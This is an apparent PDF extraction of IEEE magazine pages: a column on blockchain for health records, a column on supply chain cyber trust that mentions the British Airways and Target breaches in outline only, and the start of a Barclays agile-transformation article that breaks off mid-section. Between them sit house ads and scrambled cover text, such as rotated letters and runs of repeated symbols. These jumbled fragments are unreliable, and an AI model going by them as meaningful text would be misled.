BLOCKCHAIN BENEFITSTo understand blockchain’s ability to address secu-rity and privacy issues (not only related to EHRs), we consider blockchain from the perspective of identity and access management, which involves controlling information such as patient identity on computer net-works. The key issues in identity and access manage-ment concern 1) information that authenticates the subject’s identity, 2) information that describes the information (metadata), and 3) actions that various participants are authorized to know and perform.

The first three rows in Table 1 show current issues related to identity and access management in health-care that may be improved upon by using blockchain.

As previously mentioned, there are drawbacks to existing identity-management techniques that rely on password-based systems. In a blockchain model, a patient’s full medical records may be stored in a blockchain ledger’s key ring and encrypted using the patient’s private key. While a blockchain-based system is not 100% foolproof (e.g., a person’s private key can be stolen), it is thought to be more secure than most other current systems.

Blockchain offers audit trails, i.e., documentation of the events related to the creation, modification, and deletion of electronic records, thus resulting in transparency. Researchers at the MIT Media Lab and Boston’s Beth Israel Deaconess Medical Center proposed MedRec, a blockchain-based decentralized record management system to handle EHRs. MedRec manages authentication, confidentiality, account-ability, and data sharing.7 Using this system, patients can access their medical information from different providers and treatment sites. An immutable log of all transactions involving a patient’s information is

Key issuesin identity and access management Explanation and examples

Challenges with the currentsystem

Blockchain’s potential toaddress the challenge

Informationauthenticatingthe subject’sidentity

Information to verify that someone is whohe/she claims to be. Examples include ausername and password or a thumbprint.

Current identity-managementtechniques in hospitals rely onpassword-based systems, whichinvolve shared secrets thatare exchanged and stored oninsecure systems.

In blockchain-based identityauthentication, eachtransaction needs to be signedby the correct private key.Only the patient has theprivate key.

Information describing the information

Information about di�erent pieces of data �owamong participants (e.g., healthcare vendorand patients) and records of data transaction.Information about users’ preferencesregarding how their data can be used.Consent management records betweenpatients and healthcare services providers.

There are no audit trails of whoaccessed patients’ data. Somehospitals still rely on papermedical records.

The presence of an audittrail means that there iscomplete documentation ofevents related to the creation,modi�cation, and deletion ofelectronic records.

Actions that various participants are authorized to perform

An access policy speci�es access rights andprivileges of each participant. For example,insurance companies cannot have access topatients’ con�dential medical records.

Various parties are authorizedto take actions based onpatients’ data.Patients often have no controlover their own data.

Blockchain preventsunauthorized andillegitimate access to data.Patients hold ownership andultimate control over theirinformation.

Ine�cient administrative, logistical, andservice delivery processes lead to higher costs,lost time, and fewer bene�ts.6

A consumer has access to her/his up-to-date healthcareinformation and can forwardto a healthcare serviceprovider as and when needed.

Ine�cient procedures totransfer data across healthcareservices providers.Policy and regulatoryheterogeneity acrossjurisdictions.

TABLE 1. Improving security and efficiency in healthcare: Blockchain’s potential improvements.


CYBERTRUST

created and provided to the patient.7 MedRec does not store patients’ health records; rather, its system stores the record’s signature in a blockchain. The signature provides assurance that the record’s unaltered copy is the one that is obtainable.

Using blockchain, patients hold ownership and ultimate control over their information and decide where their records can travel. In this way, the locus of control is shifted from the institution providing healthcare to the patient. For patients who do not want to manage their data, service organizations may evolve allowing patients to delegate that task to them.4

Ensuring that healthcare providers authorize the right person and only the right person is a challenge for implementing blockchain-based models in EHRs in most countries. By adopting a unique digital ID for the identification and authentication of patients, nations can achieve a higher degree of effectiveness for such models. By doing so, they can also improve the quality of healthcare, eliminate insurance fraud, and enhance administrative efficiency.8

The bottom row in Table 1 shows how blockchain reduces inefficiency. A key benefit of blockchain-based EHRs is that there is no entity between the patient and his or her medical records. Moreover, there is no need to create custom functionality for each EHR vendor.4 In the previous example, a patient’s treatment will not be delayed simply because medical information sent from a service provider to a hospital was not received; patients can securely share this information with dif-ferent providers throughout their lifetimes.4 If there is any change in the patient’s condition, the data related to these changes are communicated to the ledger by authorized parties.9 Thus, timely access to accurate and up-to-date information should improve the effi-ciency of patient care.

BLOCKCHAIN CHALLENGESThere are challenges and limitations facing block-chain’s management of EHRs. The main barriers to introducing blockchain may be educational rather than technical (http://www.economist.com/news /business/21722869-anti-establishment-technology -faces-ironic-turn-fortune-governments-may-be-big -backers). There has been a general lack of awareness of blockchain’s benefits to the medical field.

There are also control- and ownership-related fac-tors, i.e., healthcare providers may encounter barriers that prevent them from moving to blockchain. The psy-chological challenges healthcare organizations face must be recognized and dealt with so that concerns related to privacy, security, and integrity are addressed. The current mindset among many healthcare provid-ers is that they are the only “steward” of patient data in their respective organizations.9 It might be difficult to change this culture, but evidence suggests it is neces-sary. Additionally, not all individuals are in a position to handle their medical data themselves; e.g., older persons or patients with mental illness and dementia may be unable to utilize blockchain to hold ownership and ultimate control over their information.

Furthermore, there are EHR privacy laws such as the Health Insurance Portability and Accountability Act of 1996 that must be enforced (https://tinyurl .com/ydcllwzz). As mentioned previously, blockchain’s transparency is not always conducive to privacy. We believe, however, that when appropriate encryption is used for the actual hard patient data and proper con-trol is applied to a specific patient’s chain, these two competing forms of trust can occur simultaneously.

There are also scalability challenges associated with blockchains because the size of medical records increases. Using blockchain, a patient’s complete medical records must be stored at each node that par-ticipates in the network. This may create data-storage and bandwidth problems.10

LOOKING FORWARDAll access to healthcare data should be monitored and logged, and unmonitored access to identifiable infor-mation should be prohibited. It may not be realistic or feasible to achieve this goal for current EHR models yet. In many healthcare organizations, mechanisms do not exist to ensure that patient data are not accessed by unauthorized users, and current EHR infrastructure may not meet patient privacy requirements.

These challenges may be addressed with block-chain, which can solve the broader problem of systems relying on password-based security and authentica-tion. The blockchain ledger includes an audit trail and data that are time-stamped, which allows the patient to know (within reason) who made what changes and when. Third parties such as healthcare providers can


CYBERTRUST

see patient data with the patient’s permission, but they are not required or expected to store the data. In this way, a blockchain-based model is superior to exist-ing data-governance models.

In recent years, significant initiatives have been undertaken in a range of settings that use block-

chain to strengthen the security and privacy of health-care data. The main focus of many of those initiatives has been on audit trails. Blockchain may also lead to more efficient healthcare practices by addressing existing inefficiencies that cause lost time, poorer care, and higher costs.

ACKNOWLEDGMENT I thank Jeff Voas for his contributions to this article.

REFERENCES 1. D. Munro , Data breaches in healthcare totaled over 112

million records in 2015 . 2015 . [Online]. Available: https://www.forbes.com/sites/danmunro/2015/12/31/data-breaches-in-healthcare-total-over-112-million-records-in-2015/#5a1974687b07

2. F. Bazzoli , FDA, IBM Watson Health to study application of blockchain technology . 2017 . [Online]. Available: https://www.healthdatamanagement.com/news/fda-ibm-watson-health-to-study-application-of-blockchain-technology

3. A. W. Mathews and D. Yadron , Health insurer Anthem hit by hackers . 2015 . [Online]. Available: https://www.wsj.com/articles/health-insurer-anthem-hit-by-hackers-1423103720

4. J. D. Halamka , A. Lippman , and A. Ekblaw , The potential for blockchain to transform electronic health records . 2017 . [Online]. Available: https://hbr.org/2017/03/the-potential-for-blockchain-to-transform-electronic-health-records

5. P. M. Schwartz and D. J. Solove , “ The PII problem: Privacy and a new concept of personally identifiable information ,” New York Univ. Law Rev. , vol. 86 , pp. 1814 – 1894 , 2011 .

6. H. de Koning , J. P. Verver , J. van den Heuvel , S. Bisgaard , and R. J. Does “ Lean Six Sigma in healthcare ,” J. Healthcare Quality , vol. 28 , no. 2 , pp. 4 – 11 , 2006 .

7. A. Ekblaw , A. Azaria , J. D. Halamka , and A. Lippman , “ A case study for blockchain in healthcare: ‘MedRec’ prototype for electronic health records and medical

research data ,” MIT Media Lab., Beth Israel Deaconess Med. Center , Boston, MA , White Paper, 2016 .

8. The World Bank . ( 2018 ). The role of digital identification for healthcare: The emerging use cases . The World Bank . Washington, D.C . [Online]. Available: http://pubdocs.worldbank.org/en/595741519657604541/DigitalIdentification-HealthcareReportFinal.pdf

9. L. Silverma , How bitcoin technology could securely share medical records among your doctors . 2017 . [Online]. Available: http://keranews.org/post/how-bitcoin-technology-could-securely-share-medical-records-among-your-doctors

10. L. A. Linn and M. B. Koo , Blockchain for health data and its potential use in health IT and healthcare-related research . 2016 . [Online]. Available: https:/www.healthit.gov/sites/default/files/11-74-ablockchainforhealthcare.pdf

NIR KSHETRI is a professor of management at the Bryan School of Business and Economics at the University of North Carolina at Greensboro. Contact him at [email protected] .

The #1 AI Magazine www.computer.org/intelligent

IEEE

Cutting Edgestay on the

P U T T I N G A I I N T O P R A C T I C E

IEE

E

January/fEbruary 2016

Also in this issue: aI’s 10 to Watch 56 real-Time Taxi Dispatching 68 from flu Trends to Cybersecurity 84

www.computer.org/intelligent

IEEE Ja

nu

ary/FEBru

ary 2016

On

line B

ehA

viO

rA

l An

Aly

sis VO

LuM

E 31 nu

MBEr 1

IS-31-01-C1 Cover-1 January 11, 2016 6:06 PM

IEEE Intelligent Systems provides peer-

reviewed, cutting-edge articles on the

theory and applications of systems

that perceive, reason, learn, and

act intelligently.

of Artificial Intelligence

Evolving Career Opportunities Need Your SkillsExplore new options—upload your resume today

Changes in the marketplace shift demands for vital skills and talent. The IEEE Computer Society Jobs Board is a valuable resource tool to keep job seekers up to date on the dynamic career opportunities offered by employers.

Take advantage of these special resources for job seekers:

No matter what your career level, the IEEE Computer Society Jobs Board keeps you connected to workplace trends and exciting career prospects.

JOB ALERTS

CAREER ADVICE

WEBINARSTEMPLATES

RESUMES VIEWED BY TOP EMPLOYERS

www.computer.org/jobs


O rganizations increasingly share data, cre-dentials, software code, applications, net-works, and infrastructures with “trusted”

supply chain partners. Supply chains can be sources of cyber-vulnerabilities. One estimate has suggested that supply chains account for 80% of all cyber breaches (https://www.industryweek.com/supply -chain/can-t-turn-back-time-cybersecurity-must-be -dealt). Insecure supply chains have fostered well- known cyberattacks.

In a quest to break large organizations’ networks, cyber-criminals may look beyond the first-tier sup-ply chain partners. According to Accenture's Cyber Threatscape Report (2018), hackers have an increased focus on exploiting third- and fourth-party supply chain partners to infiltrate large organizations.1 Another trend has been attacks on hardware products via backdoors and with malware insertion.2

VULNERABILITIES AND EXPLOITSSupply chains are vulnerable and subject to exploita-tion. Table 1 provides examples.

Consider software development. By attacking smaller software providers, hackers have been able to infiltrate larger organizations that rely on software. For example, in a British Airways (BA) case, hackers attacked third-party code that ran payment authoriza-tion by injecting their own malicious code into it. This meant that the hackers did not need to access or pen-etrate BA networks.4 The hackers also obtained CVV numbers, however BA reported that it had not stored the CVV numbers. This suggests that the CVV numbers were intercepted when transactions occurred (https: //www.bbc.com/news/uk-england-london-45440850). According to the cyber security company RiskIQ, the BA hackers employed a “cross-site scripting” attack. In

such attacks, criminals exploit a third-party website to launch cyberattacks against other entities.

Nation-states can also exploit supply chains for spying. For example, according to the cybersecurity company Area 1, several nations may have collabo-rated to launch a cyberattack on the Saudi oil company Aramco in 2017 (https://foreignpolicy.com/2017/12/21 /cyber-at t ack-t ar get s-safet y-system -at-saudi -aramco/).

CHALLENGESChallenges exist in securing supply chains. For example, companies may assign a lower priority to supply chain risks than other types of risks. A survey conducted among the members of Consumer Packaged Goods Vertical Strategy Group revealed that while 100% of the respondents assessed IT risks, only 75% assessed supply chain risks. Likewise, only 75% considered min-imizing supply chain cyber risks as a third-party risk management goal.3 Furthermore, although most orga-nizations conduct annual risk assessments, those may be insufficient to deal with the challenges fac-ing supply chains (https://thehill.com/blogs/congress -blog/technolog y/403958-washington-to-finally -focus-on-threat-to-supply-chain-risk).

Trust in any supply chain is a complex problem that is hard to measure and achieve. Supply chains of large organizations are often complicated and involve large numbers of partners and products. For example, one cybersecurity firm noted that one of its client's supply chains involved more than 5000 com-panies (https://finfeed.com/small-caps/technology /british-airways-data-breach-throws-whitehawks-us -government-contract-into-light/). Thus, it is challeng-ing to monitor supply chains with so many stakehold-ers involved, and particularly in real-time. A survey found that 72% of companies lacked full visibility into their supply chains.4

While the problem has been recognized since the 1970s, the severity of this issue is compounded

Digital Object Identifier 10.1109/MITP.2019.2895423 Date of current version 27 March 2019.

COLUMN: IT TRENDS

Supply Chain TrustNir Kshetri, University of North Carolina at Greensboro

Jeffrey Voas, Fellow, IEEE


vol. 21, no. 2, 2019


IT TRENDS

by the rapid internationalization of technology and the global division of labor (https://krebsonsecurity .com/2018/10/supply-chain-security-101-an-experts -view/). Simply blocking foreign companies from being dominant suppliers may not be effective. For example, China controls of a large proportion of the global supply chain yet offers no guarantee that their products have security built-in since the designs of those products may occur in other countries (https: //www.nytimes.com/2018/10/12/technology/the-week -in-tech-fears-of-the-supply-chain-in-china.html).

In some countries, electronic components pro-duced in those countries are sold by various “white label” firms. If security flaws are identified in com-ponents that were “white labeled,” it may be difficult to know which companies white-labelled a specific component, and it will be difficult to inform consum-ers about these flaws. In another scenario, when a security hole is found in a specific vendor product, that vendor may simply go out of business and restart under a different name (https://krebsonsecurity.com /2 0 18/ 10/s up p l y - c ha in - s e c ur i t y - i s -t h e - w h o l e -enchilada-but-whos-willing-to-pay-for-it/). And when white-labeling occurs, the original manufacturer may have little incentive to increase trust in their products beyond what the rebranding companies require.

Another problem is related to the lack of regula-tory and enforcement mechanisms. Some govern-ment methods for monitoring supply chain trust focus more on preventing counterfeit products than on espionage activities (https://www.techrepublic .com/article/5-tips-to-secure-your-supply-chain -from-cyberattacks/).

And finally, consumers are often more interested in price and functionality. Increased security often makes devices slower and more expensive. Moreover, security flaws may not directly affect device own-ers but affect others. Even if owners know that their devices are being used to launch cyberattacks, the end-victims are often unknown. Manufacturers have few incentives to make securer devices until custom-ers demand it.

POSSIBLE APPROACHESTable 2 presents four potential avenues for enhancing supply chain security and trust.

GovernmentsRegulatory measures are one approach intended to increase supply chain trust. Efforts to do this have already been undertaken. In September 2018, the Trump Administration released a National Cybersecu-rity Strategy that requires federal agencies to invest in more secure supply chain technologies (Feldman, 2018).5

There have also been attempts to introduce for-mal legislation to increase trust in supply chains. In September 2018, the U.S. Senate Homeland Security and Governmental Affairs Committee approved the Federal Acquisition Supply Chain Security Act. The Act is intended to improve information sharing within the intelligence community. It also estab-lishes an inter-agency process to exclude companies from contracting with the federal government if it deemed that they may pose threats to the federal supply chain.6

Supply chain partner compromisedEffectReported inOrganization

Flaws in the enterprise platform (h�ps://www.wired.com/story/equifax-breach-no-excuse/) that collected website performancedata and served malicious content (h�p://www.latimes.com/business/la-fi-equifax-social-security-numbers-20171012-story.html).

40 million creditand debit-cardaccounts and 70million people.

40 000 U.K. users

380 000 customers

143 million people2017

September 2018

Early 2018

December 2013

Equifax

British Airways

Ticketmaster

Target Started with stealing credentials of Target’s HVAC vendor (h�ps://www.csoonline.com/article/2601021/security0/11-steps-a�ackers-took-to-crack-target.html). The hackers then used the stolen cre-dentials to gain access to Target-hosted web services that werededicated to vendors.

Customer-service chatbot supplied by a third-party (h�ps://www.bbc.co.uk/news/technology-44642567).

Third-party so�ware code used to run payment authorization.

TABLE 1. Examples of cyberattacks involving supply chain partners.


IT TRENDS

Government agencies have also taken steps to increase awareness of supply chain risks by provid-ing guidelines to strengthen security. In 2013, the U.S. Department of Homeland Security (DHS) released guidelines that outline device manufacturers’ roles and obligations related to IoT security. DHS urged companies producing IoT products to “build security in” at the design phase.

Government stakeholders can also consider teaming with private sector stakeholders to monitor vulnerabilities and share relevant information. This could lead to greater awareness and recognition of supply chain cyber-threats (https://www.weforum .org/agenda/2018/06/managing-risk-in-the-energy -sector-s-cyber-supply-chain). A recent report by MITRE on securing the U.S. Pentagon's cyber supply chain recommended the establishment of a National Supply Chain Intelligence Center. The report recom-mended that the Center be co-led by civilian and military agencies (Https://Advance.lexis.com/api /document?collection=news&id=urn:contentItem :5TG6-7771-JBHM-S2HW-00000-00&context=1516831).

Industry and Trade AssociationsIndustry groups and trade associations may also be able to play a role here.

One is an example of this occurred in January 2017; a group including Cisco, Bosch, Bank of New York Mel-lon, Foxconn, Dutch cybersecurity company Gemalto, and other blockchain startups came together to

develop a team that plans to establish blockchain pro-tocols for IoT devices, applications, and networks (bit.ly /2kNtm7w).

Note that blockchain has the potential to strengthen supply chain trust. Blockchain can facilitate the handling and dealing with crisis situations such as product recalls. Blockchain's public transparency offers traceability allowing for a backward trace to the origin of a final product's raw materials. Furthermore, transactions recorded in blocks might be able to pre-dict and identify the end-users of vulnerable products.

The reason that blockchain holds promise here is that the blocks can register the time of transaction, the location of transaction, price, parties involved, and other information as an item changes ownership and moves through a workflow or manufacturing process. Blockchain's distributed ledger technology can also track raw materials as they move through a supply chain over time. Blockchain can also register updates, patches, and part replacements applied to end-products throughout their lifetime. This offers tracking of vulnerabilities and notifications for end-users.

MANUFACTURERS AND SERVICE PROVIDERS

Manufacturers and service providers can lever-age their buying power to strengthen trust in supply chains. How? They can evaluate the security practices of supply chain partners and insist that applicable

Examples/RemarksMechanismsLevel

National/state Increasing investment in technological andhuman capabilities.Introducing formal legislation tosecure supply chains.Increasing awareness of supply chain risks andproviding guidelines to strengthen security.

The U.S.: National Cybersecurity Strategy requires federalagencies to invest more in secure supply chain technologies.The Federal Acquisition Supply Chain Security Act. DHSguidelines that outline device manufacturers’ roles andobligations surrounding IoT security.

Industry group/trade association

Fill the regulatory vacuum.Resource and expertise advantages.

Diverse networking, engineering, financial, electronics,cybersecurity, and blockchain businesses team to developblockchain functionality to improve supply chain trust.

Manufacturersand serviceproviders

Ensure that supply chain partners follow securitystandards. Continuously monitor supply chaincyber risks.Develop and implement new ways to assessand deal with supply chain risks.

Purchasing power.

Organizations employ Cyber Risk Frameworks to identifyrisks associated with sub-contractors.

Consumers Changing consumer mindset to require vendors to followresponsible security practices.

TABLE 2. Possible measures at various levels to secure supply chains.


IT TRENDS

security standards are followed. Furthermore, com-pliance can sometimes be mandated through con-tracts (https://www.cbronline.com/solutions/us - organisations-not-battle-ready-in-war-against -cybercrime-4280918/), however, determination of compliance is often elusive.

Manufacturers and service providers may also consider developing new ways to assess and mitigate supply chain risks. For example, artificial intelligence and machine learning may be able to fight specific types of malware attacks in software supply chains. Over time, such tools “learn” to detect unusual patterns in various supply chain environ-ments (http://www.cioandleader.com/article/2018 /02/22/india-invest-heavily-ai-based-tools-counter -cyber-attacks-cisco). IBM's AI platform, Watson, is being used to provide predictive analytics to minimize disruptions and risks (https://www.forbes .com/sites/andrewarnold/2018/05/26/how -the -internet-of-things-impacts-supply-chain/).

Solutions that focus on risks associated with sup-ply chain partners, subcontractors, and vendors can also be employed. WhiteHawk's 360 Risk Framework evaluates software vendors and service providers. The first customer of WhiteHawk's product was a U.S.-based financial institution whose goal was to identify the institution's exposure to cybersecurity risks induced by its 50 most important subcontractors. The identified subcontractors were expected to address their cyber risks (https://finfeed.com/small-caps /technology/whitehawk-wins-us325k-first-sale-cyber -risk-product/).

And finally, it may be useful to contract for the external services that will continuously monitor the cyber risks associated with third-party vendors (https: //threatpost.com/five-weakest-links-in-cybersecurity -that-target-the-supply-chain/137453/). Realize that if only an annual risk assessment is performed, security problems may be discovered too late for mitigation and after damage occurs. More frequent assessments should provide a fuller picture of supply chain risks so that more timely mitigation measures can be applied.

CONSUMERSConsumer buying power can also be leveraged to strengthen supply chain trust. For instance, con-sumers could add pressure to manufacturers to

incorporate security “best practices” into develop-ment life cycles. If consumers demanded more secure products and services, manufacturers might be more likely to source their components from contractors with known and demonstrated levels of security.

An encouraging trend here involves consumer mindset. Recent surveys have suggested that con-sumers expect businesses to follow responsible security practices. According to the RSA Data Privacy & Security Report that was based on a survey of 7500 consumers in France, Germany, Italy, the UK and the U.S., 62% of the respondents said that they would blame the company, not the hacker, if their data is breached.7 Likewise, a survey of 1000 U.K. consum-ers commissioned by FireEye indicated that 72% of consumers would stop purchasing from a company if a security breach was found to be linked to the com-pany's failure to prioritize security and privacy (http: //www.itproportal.com/2016/05/11/high-profile-data -breaches-affecting-consumer-trust-in-big-brands/).

SUMMARYSupply chains are increasingly vulnerable and threat-ened. Trust in supply chains is a difficult proposition. Adversaries can inject malware and other malicious defects anytime during manufacturing and design. And it is hard to assess trust for international sup-ply chains.

The problem of trusting supply chains is unlikely to go away soon. It is an analogous problem to that of drug smuggling—smugglers continue to find new ways to hide their illegal products during transport while law enforcement tries to catch up.

So, in closing, let us revisit our title: Supply Chain Trust, a topic that is both timely and timeless. Is trust here possible? “Yes,” but with caveats, and probably many.

DISCLAIMERThe authors are completely responsible for the con-tent in this paper. The opinions expressed here are completely their own.

REFERENCES1. J. Ray et al., “Cyber threatscape report 2018,” 2018.

Available: https://www.accenture.com/gb-en/insights /security/cyber-threatscape-report-2018


IT TRENDS

2. L. Newman , “ There’s no good fix if the supply chain gets hacked ,” 2018 . Available: https://www.wired.com/story/supply-chain-hacks-cybersecurity-worst-case-scenario/

3. PCU , “ Consumer packaged goods sector needs decisive, unified action in the face of third party risks ,” Plus Company Updates(PCU), Oct. 3, 2018 . Available: https://advance.lexis.com/api/document?collection = news&id = urn:contentItem:5TD9-23N1-J9XT-P0J4-00000-00&context=1516831

4. P. Myerson , “ Can’t turn back time: Cybersecurity must be dealt with ,” Ind. Week , Jan. 2017 . Available: https://www.industryweek.com/supply-chain/can-t-turn-back-time-cybersecurity-must-be-dealt

5. V. Feldman , “ Trump administration moves to address cybersecurity concerns, congress funds cyber pro-grams ,” 2018 ; Nat. Law Rev. , Retrieved from Nexis Uni.

6. “Senate Panel Clears Supply-Chain Bill Intended To ‘Bridge’ Gaps With DOD, ” Inside Pentagon , Oct. 4,

2018 . Available: https://advance.lexis.com/api/document?collection=news&id=urn:contentItem:5TDG-6NR1-DY0P-G376-00000-00&context=1516831

7. M. Nadeau , “ General data protection regulation (GDPR) requirements, deadlines and facts ,” 2018 . Available: https://www.csoonline.com/article/3202771/data-protection/general-data-protection-regulation-gdpr-requirements-deadlines-and-facts.html

NIR KSHETRI is a Professor of management with the Bryan School of Business and Economics, the University of North Carolina at Greensboro, Greensboro, NC, USA. Contact him at [email protected] .

JEFFREY VOAS was a Cofounder of Cigital, is Computer ’s Cybertrust column editor, and is an IEEE Fellow. Contact him at [email protected] .

IEEE Computer Graphics and Applications bridges the theory and practice of computer graphics. Subscribe to CG&A and

• stay current on the latest tools and applications and gain invaluable practical and research knowledge,

• discover cutting-edge applications and learn more about the latest techniques, and

• benefit from CG&A’s active and connected editorial board.

September/October 2016

IEEE CO

MPU

TER G

RA

PHIC

S AN

D A

PPLICAT

ION

S Sep

temb

er/Octo

ber 2

016

Spo

rts Data V

isualizatio

n

VO

LUM

E 36 N

UM

BER 5

c1.indd 1 8/22/16 2:59 PM

November/December 2016

IEEE CO

MPU

TER G

RA

PHIC

S AN

D A

PPLICAT

ION

S N

ovem

ber/D

ecemb

er 2016

D

efense A

pp

lication

s V

OLU

ME 3

6 N

UM

BER 6

DefenseApplications

c1.indd 1 10/24/16 3:44 PM

January/February 2017

IEEE CO

MPU

TER G

RA

PHIC

S AN

D A

PPLICAT

ION

S Jan

uary/Feb

ruary 2

017

Water, Sky, an

d th

e Hu

man

Elemen

t V

OLU

ME 37

NU

MB

ER 1

c1.indd 1 12/14/16 12:21 PM

July/August 2016

IEEE CO

MPU

TER G

RA

PHIC

S AN

D A

PPLICAT

ION

S Ju

ly/Au

gu

st 2016

Q

uality A

ssessmen

t and

Perceptio

n in

Co

mp

uter G

raph

ics V

OLU

ME 3

6 N

UM

BER 4

Quality Assessment

andPerceptionin Computer Graphics

c1.indd 1 6/22/16 1:20 PM AAAAAAAAAAAAAAAAAA&&&&&&&&&&&&&&&&&&&&&&GGGGGGGGGGGGGGGGGGGGGGCCCCCCCCCCCCwww.computer.org/cga

IEEE INTERNATIONAL SYMPOSIUM ON HARDWARE -ORIENTED SECURITY AND TRUST

REGISTER NOW

!

REGISTER NOW: www.hostsymposium.org

6–9 Dec. 2020 • San Jose, CA, USA • DoubleTree by Hilton

Join dedicated professionals at the IEEE International Symposium on Hardware Oriented Security and Trust (HOST) for an in-depth look into hardware-based security research and development.

Key Topics:

• Semiconductor design, test and failure analysis

• Computer architecture• Systems security

• Cryptography and cryptanalysis

• Imaging and microscopy

Discover innovations from outside your sphere of infl uence at HOST. Learn about new research that is critical to your future projects. Meet face-to-face with researchers and experts for inspiration, solutions, and practical ideas you can put to use immediately.

6–9 Dec. 2020 • San Jose, CA

HOST2020


EDITOR: Mik Kersten, Tasktop, [email protected]

DEPARTMENT: ON DEVOPS

To Transform to Have Agility, Don’t Do a Capital A, Capital T Agile TransformationJonathan Smart

H istorically, in large, old, complex organiza-tions (the horses rather than the unicorns) that have adopted agile and DevOps princi-

ples and practices, the adoption has been at the team level. From my experience of delivering software with agile principles since the early 1990s, these “islands of agile” most often arise despite the firm, not because of the firm, owing to employees with a growth mind-set willing to take a personal risk.

The agile islands are a local optimization in the end-to-end value stream. A 90 percent reduction in a development team’s lead time might have a negli-gible impact on the time from when customer needs are identified to when those needs are met. Look to the right, the constraint could be IT operations staff, who are incentivized to protect uptime, batching up change. Look to the left, the constraint is the portfolio management and funding black hole, with an annual

cycle. Look up, there’s a command-and-control leader-ship style, with low levels of psychological safety. Look around, other teams aren’t agile and dependencies aren’t broken, such that the end-to-end lead time for customer value doesn’t decrease.

As of 2017, only 10 percent of Fortune 500 compa-nies from 1955 were still in the Fortune 500.1 At the cur-rent churn rate of the S&P 500, half of the firms will be replaced over the next 10 years.2 Tectonic shifts in the competitive landscape are occurring owing to

› cloud computing; › mobile devices’ prevalence and capabilities; › increased communication bandwidth and

information transparency; › increased venture capital funding chasing a

return, owing to historically low interest rates and volatility;


vol. 35, no. 6, 2018

FROM THE EDITOR

The concept of “flow” is a common thread in DevOps. In a previous On DevOps article (“Modular Archi-tectures Make You Agile in the Long Run,” Jan./Feb. 2018, pp. 104–108), Dan Sturtevant summarized how our thinking about software architecture needs to change to support flow. But software architecture alone isn’t enough. If we’re going to take a holistic view of DevOps and agile development, we need to consider how the organization and business need to change. This is easy to consider on a small scale but is an entirely different problem when an organization has tens of thousands of IT staff. Consequently, few people have the experience of implementing flow at scale. Jon Smart, Head of Ways of Working at Barclays, is a rare exception and one of the best thinkers I know on this topic. Here, he shares his experi-ences on how to shift our perspective on organizational transformation and objectives to take DevOps’ benefits from the small scale of startups and “unicorns” to the massively more complex scale of enter-prise IT. —Mik Kersten


ON DEVOPS

› government regulation increasing competition; and

› increased competition from nontraditional born-agile competitors.

These shifts are leading companies to realize that a business-as-usual approach won’t result in business as usual.

In recent years, enterprise-wide DevOps and agile at scale have surged. Compared to nearly 30 years of “lightweight methodologies” for team-level software development, this is a new field. DevOps emerged as a term in 2009, with scaled agile frameworks com-ing out comparatively recently: SAFe (Scaled Agile Framework) in 2011, Disciplined Agile in 2012, and LeSS (Large-Scale Scrum) in 2013. However, relatively little research is available about these frameworks’ effec-tiveness in practice, especially on an enterprise scale.

Here, I share lessons learned from being a servant leader for agility at scale across Barclays since 2015. Barclays is a global financial-services firm, with 80,000 employees in 40 countries, founded in 1690 in the City of London. Every day Barclays processes the equiva-lent of one-third of the UK’s annual GDP—approxi-mately £600 billion. Barclays meets a financial need of almost 50 percent of UK adults and operates in a highly regulated industry.

Context is key; the context here is large, old,

complex, not born-agile organizations with many diverse product offerings, colleagues, and custom-ers, used to working in a traditional way. Reinventing organizations with legacy and complexity as we enter the digital revolution is a difficult and interesting challenge in which only the most adaptable will sur-vive. On the basis of my experience, here are the main antipatterns related to scaling agility and DevOps, paired with the patterns that have helped us succeed at Barclays’ scale.

ANTIPATTERN 1: DOING A CAPITAL A, CAPITAL T AGILE TRANSFORMATION

A capital A, capital T Agile Transformation, from an employee’s perspective, implies involuntary, manda-tory change being done to you, whether you like it or not. The capital T denotes that you must change; the capital A denotes exactly how you’ll change. This pro-vokes fear and resistance for many reasons,3 includ-ing the fear for your survival, which in turn leads to less rational thought as the primitive brain takes over.4

Dan Pink posited three key drivers of motivation: autonomy, purpose, and mastery.5 In this antipattern, two of those drivers—autonomy and mastery—have been taken away. If the “why” isn’t well articulated, meaningful purpose is also removed, eliminating all three key drivers.

ShockSurpriseor shockat the event

Mor

al &

com

pete

nce

Time

DenialDisbelief;looking forevidence thatit is’t true

FrustrationRecognitionthat thingsare different;sometimesangry

DepressionLow mood;lacking inenergy

ExperimentInitialengagementwith newsituation

DecisionLearning howto work in thenew situation;feeling morepositive

IntegrationChangesintegrated;a renewedindividual

FIGURE 1. The Kübler-Ross curve.8 The behaviors during grief also hold true in the context of corporate change.


ON DEVOPS

PATTERN 1: START WITH “WHY,” AND FOCUS ON OUTCOMES

As Simon Sinek articulated, start with “why.”6 There should be a clear, well-communicated “why” of the need to change. The “why” should be more than prof-itability, shareholder returns, or stock price. In “The Irrational Side of Change Management,” Carolyn Aiken and Scott Keller stated,

What the leader cares about (and typically bases at least 80 percent of his or her message to others on) does not tap into roughly 80 percent of the workforce’s primary motivators.7

This research shows that employees are most motivated by a purpose that’s split equally across five forms of impact: society, the customer, the company, the team, and the individual.

From the “why,” identify high-level, thematic desired outcomes, rather than agile for agile’s sake. For us, the desired outcomes are described as Better, Value, Sooner, Safer, and Happier, each of which is measurable.

ANTIPATTERN 2: THE BIGGER THE CAPITAL T, THE BIGGER THE CHANGE CURVE

The Kübler-Ross Curve (see Figure 1) originated from psychiatrist Elisabeth Kübler-Ross’s work on grief. We’ve repeatedly observed these behaviors to hold true in the context of change, via feedback from employee surveys.

The bigger the capital T Transformation, the bigger the change curve. If embarking on one large Transfor-mation, expect a deep dip in the curve. Such a trans-formation doesn’t apply an agile mind-set to increase organizational agility. It will make the journey more challenging, with more denial, frustration, and anger. The change stands a higher chance of cultural rejec-tion, with more ammunition for those averse to change.

PATTERN 2: ACHIEVE BIG THROUGH SMALL

Instead of a big-bang transformation, with one big dip in the curve, achieve a big outcome through early, fre-quent, and small slices of value. Pursue evolutionary and continuous transformation aligned to outcomes,

linking together a series of smaller change curves. Start in areas that are naturally receptive. The dips aren’t as deep, the learning comes quicker, there’s less risk, and the champions, who have been trying to do this despite the firm in the past, are best placed to beat a path through the organizational jungle.

ANTIPATTERN 3: ONE SIZE FITS ALLOften combined with the previous antipatterns is the imposition of a one-size-fits-all approach across an organization. Large, old organizations are heteroge-neous, not homogeneous. A one-size-fits-all approach won’t maximize the desired outcomes. Scaling is about complexity, diversity, and building a learning and con-tinuous improvement (CI) capability.

With many unique contexts, the practices should differ:

Principles + Context = Practices9

PATTERN 3: FOCUS ON THE OUT-COMES, WITH AN EMPOWERED AND FEDERATED MODEL

